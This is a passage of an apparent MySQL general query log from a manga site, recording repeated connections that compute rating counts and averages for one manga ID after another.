where manga_id = '217' order by created desc 330642826 Quit 330642827 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642827 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330642827 Quit 330642828 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642828 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '31' order by created desc 330642828 Quit 330642829 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642829 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330642829 Quit 330642830 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642830 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330642830 Quit 330642831 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642831 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330642831 Quit 330642832 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642832 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '32' order by created desc 330642832 Quit 330642833 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642833 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330642833 Quit 330642834 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642834 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330642834 Quit 330642835 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642835 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330642835 Quit 330642836 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642836 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '101' order by created desc 330642836 Quit 330642837 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642837 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330642837 Quit 330642838 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642838 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330642838 Quit 330642839 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642839 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '17' order by created desc 330642839 Quit 330642840 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642840 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '68' order by created desc 330642840 Quit 330642841 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642841 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330642841 Quit 330642842 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642842 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330642842 Quit 330642843 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642843 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330642843 Quit 330642844 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642844 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330642844 Quit 330642845 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642845 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330642845 Quit 330642846 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642846 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330642846 Quit 330642847 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642847 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '87' order by created desc 330642847 Quit 330642848 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642848 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330642848 Quit 330642849 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642849 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330642849 Quit 330642850 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642850 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330642850 Quit 330642851 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642851 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330642851 Quit 330642852 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642852 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330642852 Quit 330642853 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642853 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330642853 Quit 330642854 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642854 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '77' order by created desc 330642854 Quit 330642855 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642855 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330642855 Quit 330642856 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642856 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330642856 Quit 330642857 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642857 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330642857 Quit 330642858 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642858 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330642858 Quit 330642859 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642859 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330642859 Quit 330642860 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642860 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330642860 Quit 330642861 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642861 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330642861 Quit 330642862 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642862 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330642862 Quit 330642863 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642863 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330642863 Quit 330642864 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642864 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330642864 Quit 330642865 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642865 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330642865 Quit 330642866 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642866 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '70' order by created desc 330642866 Quit 330642867 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642867 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '259' order by created desc 330642867 Quit 330642868 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642868 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330642868 Quit 330642869 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642869 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330642869 Quit 330642870 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642870 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '82' order by created desc 330642870 Quit 330642871 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642871 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330642871 Quit 330642872 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642872 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330642872 Quit 330642873 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642873 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330642873 Quit 330642874 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642874 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330642874 Quit 330642875 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642875 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330642875 Quit 330642876 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642876 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330642876 Quit 330642877 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642877 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330642877 Quit 330642878 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642878 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330642878 Quit 330642879 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642879 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330642879 Quit 330642880 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642880 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330642880 Quit 330642881 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642881 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330642881 Quit 330642882 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642882 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330642882 Quit 330642883 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642883 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330642883 Quit 330642884 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642884 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330642884 Quit 330642885 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642885 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330642885 Quit 330642886 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642886 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '37' order by created desc 330642886 Quit 330642887 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642887 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330642887 Quit 330642888 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642888 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330642888 Quit 330642889 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642889 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '86' order by created desc 330642889 Quit 330642890 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642890 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330642890 Quit 330642891 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642891 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330642891 Quit 330642892 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642892 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '307' order by created desc 330642892 Quit 330642893 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642893 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330642893 Quit 330642894 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642894 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330642894 Quit 330642895 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642895 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330642895 Quit 330642896 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642896 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '178' order by created desc 330642896 Quit 330642897 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642897 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '81' order by created desc 330642897 Quit 330642898 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642898 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330642898 Quit 330642899 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642899 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330642899 Quit 330642900 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642900 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '15' order by created desc 330642900 Quit 330642901 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642901 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330642901 Quit 330642902 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642902 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330642902 Quit 330642903 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642903 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330642903 Quit 330642904 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642904 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330642904 Quit 330642905 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642905 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330642905 Quit 330642906 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642906 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '42' order by created desc 330642906 Quit 330642907 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642907 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330642907 Quit 330642908 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642908 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330642908 Quit 330642909 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642909 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330642909 Quit 330642910 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642910 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330642910 Quit 330642911 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642911 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '10' order by created desc 330642911 Quit 330642912 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642912 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330642912 Quit 330642913 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642913 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '198' order by created desc 330642913 Quit 330642914 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642914 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '16' order by created desc 330642914 Quit 330642915 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642915 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330642915 Quit 330642916 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642916 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330642916 Quit 330642917 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642917 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '338' order by created desc 330642917 Quit 330642918 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642918 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330642918 Quit 330642919 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642919 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330642919 Quit 330642920 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642920 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330642920 Quit 330642921 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642921 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '53' order by created desc 330642921 Quit 330642922 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642922 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330642922 Quit 330642923 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642923 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330642923 Quit 330642924 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642924 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330642924 Quit 330642925 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642925 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330642925 Quit 330642926 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642926 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330642926 Quit 330642927 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642927 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '312' order by created desc 330642927 Quit 330642928 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642928 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330642928 Quit 330642929 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642929 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330642929 Quit 330642930 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642930 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330642930 Quit 330642931 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642931 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330642931 Quit 330642932 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642932 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '18' order by created desc 330642932 Quit 330642933 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642933 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330642933 Quit 330642934 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642934 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330642934 Quit 330642935 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642935 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330642935 Quit 330642936 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642936 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330642936 Quit 330642937 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642937 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '322' order by created desc 330642937 Quit 330642938 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642938 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330642938 Quit 330642939 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642939 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330642939 Quit 330642940 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642940 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330642940 Quit 330642941 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642941 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330642941 Quit 330642942 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642942 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330642942 Quit 330642943 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642943 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '11' order by created desc 330642943 Quit 330642944 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642944 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330642944 Quit 330642945 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642945 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330642945 Quit 330642946 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642946 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330642946 Quit 330642947 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642947 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330642947 Quit 330642948 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642948 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330642948 Quit 330642949 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642949 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330642949 Quit 330642950 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642950 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330642950 Quit 330642951 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642951 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330642951 Quit 330642952 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642952 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330642952 Quit 330642953 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642953 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330642953 Quit 330642954 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642954 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330642954 Quit 330642955 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642955 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330642955 Quit 330642956 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642956 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330642956 Quit 330642957 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642957 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '65' order by created desc 330642957 Quit 330642958 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642958 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330642958 Quit 330642959 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642959 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330642959 Quit 330642960 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642960 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330642960 Quit 330642961 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642961 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '311' order by created desc 330642961 Quit 330642962 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642962 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330642962 Quit 330642963 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642963 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330642963 Quit 330642964 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642964 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330642964 Quit 330642965 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642965 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '331' order by created desc 330642965 Quit 330642966 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642966 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330642966 Quit 330642967 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642967 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330642967 Quit 330642968 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642968 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '321' order by created desc 330642968 Quit 330642969 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642969 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330642969 Quit 330642970 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642970 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330642970 Quit 330642971 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642971 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330642971 Quit 330642972 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642972 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330642972 Quit 330642973 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642973 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330642973 Quit 330642974 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642974 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330642974 Quit 330642975 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642975 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330642975 Quit 330642976 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642976 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330642976 Quit 330642977 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642977 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330642977 Quit 330642978 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642978 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330642978 Quit 330642979 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642979 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id 